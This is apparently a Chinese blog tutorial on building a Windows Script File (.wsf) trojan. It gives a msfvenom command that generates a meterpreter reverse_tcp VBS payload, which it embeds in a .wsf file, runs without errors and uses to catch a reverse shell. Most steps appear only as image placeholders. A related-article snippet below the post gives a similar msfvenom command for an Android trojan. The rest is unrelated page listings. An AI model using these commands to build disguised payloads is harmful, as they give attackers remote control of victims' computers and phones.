msf 生成.wsf 木马

已于 2024-01-10 18:16:12 修改
阅读量50 收藏
点赞数
文章标签: 开发语言 服务器 web安全 网络 安全
于 2023-09-19 19:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xnxqwzy/article/details/133022920
版权

首先了解wsf是啥语言,可参考文章如下:

https://www.cnblogs.com/vitrox/p/5137441.html
https://blog.csdn.net/leyvan/article/details/3746683
http://book.51cto.com/art/201111/300472.htm

wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,

Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。

wsf后门思路

1)学习.wsf脚本格式

2)msf生成vbs

  1. msf生成vbs插入.wsf脚本格式

4)尝试运行查看是否报错

5)反弹shell

开始制作脚本:

1) .wsf脚本格式

img

2) msf生成vbs

msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport=  EXITFUNC=thread -f vbs--platform win > test.vbs

复制

img

3) msf生成vbs插入.wsf脚本中

img

4)尝试运行无查看是否报错:

直接运行无报错

img

使用cscript.exe (WindowsScript Host引擎),运行无报错:

img

5)反弹shell

监听:

img

反弹:

img

知识补充:

img

img

xiWqgJVI-1695097764356)]

[外链图片转存中…(img-tH1oNA7J-1695097764357)]

img

程序员菠萝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WSF VBS 脚本编写
蜗牛爬过的痕迹
04-13 4081
WSH – Windows Script Host (Windows脚本宿主)  是一个基于COM的脚本宿,它可以在Windows中执行脚本。它同时支持Jscript和VBScript. .WSC - windows 脚本组件。例如VBS本身没有提供访问文件系统的方法,但是可以使用Scripting.FileSystemObject  COM组件来打开文件。 WSC文件是一个XML格式的文
wsf脚本笔记
YSL88881111的专栏
01-06 188
this is a resource.
[转载]初识Windows 脚本文件(*.wsf)
孤身走我路.
11-28 1702
初识Windows 脚本文件(*.wsf) Windows 脚本文件(*.wsf) 是含有可扩展标记语言 (XML) 代码的文本文档,它综合了几个可增强脚本灵活性的功能。由于 Windows 脚本文件不是特定于引擎的,因此它们可包含与 Windows 脚本兼容的任何脚本引擎中的脚本。它们充当容器。 使用 .wsf 文件,可以在创建脚本时使用以下功能: .wsf 文件支持实现 1.  In
com.tencent.mobileqq_MSF.21.03.26.17.qlog
03-27
com.tencent.mobileqq_MSF.21.03.26.17.qlog
msfuse.rar_image fusion
07-15
本案例中,我们关注的是"msfuse.rar"这个压缩包,其中包含了关于"panchromatic"(全色)和"multispectral"(多光谱)图像融合的内容。下面我们将详细讨论这两个概念以及相关的图像融合技术。 全色图像,通常具有较...
MSF组队模型v.3.1
02-27
火龙果软件工程技术中心 摘要Microsoft解决方案框架(MSF)组队模型描述了微软如何通过构建人员以及人员的行为来实现项目成功。模型专门为小组成员定义了各类角色群、职能领域、职责和指导,帮助他们在整个项目生命...
软件工程 第四章 MSF概述.pptx
09-21
《微软解决方案框架(MSF)概述》 微软解决方案框架(Microsoft Solution Framework,简称MSF)是一种为构建IT解决方案提供方针和准则的方法论。MSF源于微软内部,由全球产品开发组、咨询服务和信息技术部门共同...
js调用 Windows 脚本文件 (.wsf)
weixin_33728708的博客
12-22 490
Windows 脚本文件 (*.wsf) 是含有可扩展标记语言 (XML) 代码的文本文档。它综合了几个可增强脚本灵活性的功能。由于 Windows 脚本文件不是特定于引擎的,因此它们可包含与 Windows 脚本兼容的任何脚本引擎中的脚本。它们充当容器。 使用 .wsf 文件,可以在创建脚本时使用以下功能: .wsf 文件支持 实现 Include 语句...
使用 Windows 脚本文件 (.wsf)
leyvan的专栏
01-10 6870
使用 Windows 脚本文件 (.wsf)Windows 脚本文件 (*.wsf) 是含有可扩展标记语言 (XML) 代码的文本文档。它综合了几个可增强脚本灵活性的功能。由于 Windows 脚本文件不是特定于引擎的,因此它们可包含与 Windows 脚本兼容的任何脚本引擎中的脚本。它们充当容器。使用 .wsf 文件,可以在创建脚本时使用以下功能:
WSF脚本详解:JS和VBS互调用
weixin_30411997的博客
01-17 588
1.概述   Windows Script Host除了提供一个对象模型之外,还提供了一种脚本框架,这就是WSF脚本。通过WSF约定的标记元素,可以将多种脚本语言写的代码块组合起来,完成任务。除此之外,还可以实现一些DOS没有的命令功能,通过CScript xxx.wsf /?来查看帮助文档,帮助文档由WSF声明并由解释器动态生成完整的文档。再联合使用WshEnvironment对象,即可对DO...
wsf
shyboy_nj的专栏
04-10 738
//程序实现在单链表的某给定字符节点后插入新结点算法,如找不到则查在尾部; //查找给定结点并删除的算法 //单链表逆转算法 #include "iostream.h" const MAXLEN=10; typedef struct _nodetype{ char elem; struct _nodetype* lp; } node; int myinterface() { int
Microsoft Excel.WsF——U盘里面的隐藏病毒怎么删除
Janet_C小屋
01-22 5710
0. 问题U盘里的文件全部变成了快捷方式,但是没有发现其他异常,杀毒软件也没能扫描出来1. 发现症结原因流程——a、U盘格式化(防止太多文件,不知道哪个有问题);b、我的电脑(计算机)——打开——如下图操作——注意把隐藏的几个选项中的勾去掉!!!;c、再打开U盘,就会发现里面有个 Microsoft Excel.WsF,这就是症结所在。解决——这个时候,首先想到的肯定是删除,可以试试,就会发现删除...
java内部类的本质
最新发布
qq_43593646的博客
07-12 450
可以定义一个类Pair,包括最大值和最小值,但Pair这个名字太普遍,而且它主要是类内部使用的,就可以定义为一个静态内部类。内部类访问了外部类的一个私有静态变量shared,而我们知道私有变量是不能被类外部访问的,Java的解决方法是:自动为Outer生成一个非私有访问方法access$0,它返回这个私有静态变量shared。外部类的一些方法的返回值可能是某个接口,为了返回这个接口,外部类方法可能使用内部类实现这个接口,这个内部类可以被设为private,对外完全隐藏。
【Linux】进程间通信——匿名管道
2201_76024104的博客
07-08 1147
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
服务器的分类有哪些
2301_78491269的博客
07-08 439
IA架构的服务器采用了开放体系结构,因而有了大量的硬件和软件的支持者,在近年有了长足的发展。所有上述描述是很不精确的,存在很多特殊情况的,比如一个网络的客户机可能很多,但对服务器的访问可能很少,就没有必要要一台功能超强的企业级服务器,由于这些因素的存在,使得这种服务器的分类方法更倾向于定性,而不是定量,也就是说从小组级到部门级到企业级,服务器的性能是在逐渐加强的,其他各种特性也是在逐渐加强的。如文件/打印服务器,这是最早的服务器种类,它可以执行文件存储和打印机资源共享的服务,至今,这种服务器还在办。
msf生成捆绑安卓木马
05-27
在Metasploit中,可以使用以下步骤生成捆绑安卓木马: 1. 打开Metasploit控制台并输入以下命令启动msfvenom: ``` msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值